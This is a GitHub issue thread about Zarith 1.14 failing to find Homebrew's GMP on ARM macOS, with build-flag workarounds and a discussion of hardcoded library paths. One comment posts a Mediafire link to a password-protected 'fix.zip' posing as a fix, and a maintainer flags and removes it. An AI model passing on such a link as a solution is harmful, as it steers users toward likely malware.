### ISSUE TITLE
Compiling Zarith 1.14 on MacOS ARM 

### ISSUE THREAD

**Issue by arozovyk** [ocaml/Zarith#156]
The `./configure` does not seem to find `gmp.h` on ARM based MacOS eventhough the gmp 6.3.0 is installed with homebrew. 

```
binary ocaml: found in /Users/arozovyk/.opam/default/bin
binary ocamlc: found in /Users/arozovyk/.opam/default/bin
binary ocamldep: found in /Users/arozovyk/.opam/default/bin
binary ocamlmklib: found in /Users/arozovyk/.opam/default/bin
binary ocamldoc: found in /Users/arozovyk/.opam/default/bin
binary ocamlopt: found in /Users/arozovyk/.opam/default/bin
checking compilation with ocamlc -O3 -Wall -Wextra : working
include caml/mlvalues.h: found
library dynlink.cmxa: found
binary ocamlfind: found in /Users/arozovyk/.opam/default/bin
OCaml's word size is 64
include gmp.h: not found
include mpir.h: not found
cannot find GMP nor MPIR
``` 

Setting the env variables to indicate the path allows to build locally 

```sh 
export CPPFLAGS="-I/opt/homebrew/Cellar/gmp/6.3.0/include $CPPFLAGS"
export LDFLAGS="-L/opt/homebrew/Cellar/gmp/6.3.0/lib $LDFLAGS"

./configure
make

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by antoinemine** [comment]
Note: I just removed a comment by user abdulhkeemGit that contained a link to a zip-file hosted on mediafire containing executable code, with no explanation and seemingly no relation to the issue at hand.

**Comment by rocodes** [comment]
This may have changed a bit, but this comment is still about hardcoded library paths (and macOS): If the build machine has homebrew installed, I think `[pkg-config --libs gmp](https://github.com/ocaml/Zarith/blob/386170fb0fd9fea4635214591e7ceea928d2cf5c/configure#L307)` is baking in a homebrew path to the compiled zarith library, so it breaks for users who have gmp in a different location or don't have homebrew installed, including for users of downstream projects that depend on zarith, which is how I got here.  

(In CI, I suspect if you tried to run the built macos binary from your release job in a mac environment without homebrew installed, you'd see an error like `: Library not loaded: /opt/homebrew/opt/gmp/lib/libgmp.10.dylib` ?)

`pkg-config --libs-only-l gmp` might do the trick instead, but I don't know if that would be an issue for Windows systems.

**Comment by xavierleroy** [comment]
> [`pkg_config`] is baking in a homebrew path to the compiled zarith library, so it breaks for users who have gmp in a different location or don't have homebrew installed, including for users of downstream projects that depend on zarith, which is how I got here.

You're right, but I'm afraid this is an inherent limitation of Homebrew (on macOS / ARM, at least): each package is installed in `/opt/homebrew/Cellar/<packagename>/<version>`, with links in `/opt/homebrew/opt/<packagename>` and `/opt/homebrew/lib`.  None of these directories is in the default linker search path, so a `-L` option is mandatory.  `pkg-config --libs-only-l gmp` doesn't work.

Worse, `pkg-config --libs` produces a `-L` option that points to `/opt/homebrew/Cellar/<packagename>/<version>`, which becomes invalid when the package is updated to a different version.  It would be more helpful if `pkg-config --libs` pointed to `/opt/homebrew/lib` or `/opt/homebrew/opt/<pkgname>/lib` instead.  We (the OCaml dev team) asked the Homebrew team to do this for the ZSTD library, and they granted our wish.  Perhaps you could ask for GMP as well.

At any rate, there's no way to handle the case of "users who have gmp in a different location or don't have homebrew installed, including for users of downstream projects that depend on zarith".  GMP is not a standard macOS library; Homebrew installs it in a directory of its choice, not in a standard directory like `/usr/lib` or `/usr/local/lib`; and I don't know of any other convenient way to install GMP on macOS/ARM besides Homebrew.

**Comment by rocodes** [comment]
hey, thanks for taking the time to reply. 

For macOS, macports and nixpkgs are two other ways for getting dependencies including gmp, but even for users that have homebrew and gmp installed, unless they have the exact same setup as whatever the macos build environment is they can't use a prebuilt binary with a zarith dependency because of what you described. 

I am not super familiar with macOS packaging, but I was wondering if it was possible to build the zarith package to either dynanically look for the gmp binary, or to support multiple possible directories for the gmp binary, so you'd end up with something like /opt/homebrew/Cellar/gmp, /opt/homebrew/opt/gmp, /opt/local/lib/gmp and whatever other paths to try to look for libgmp.dylib as a best effort:

https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html
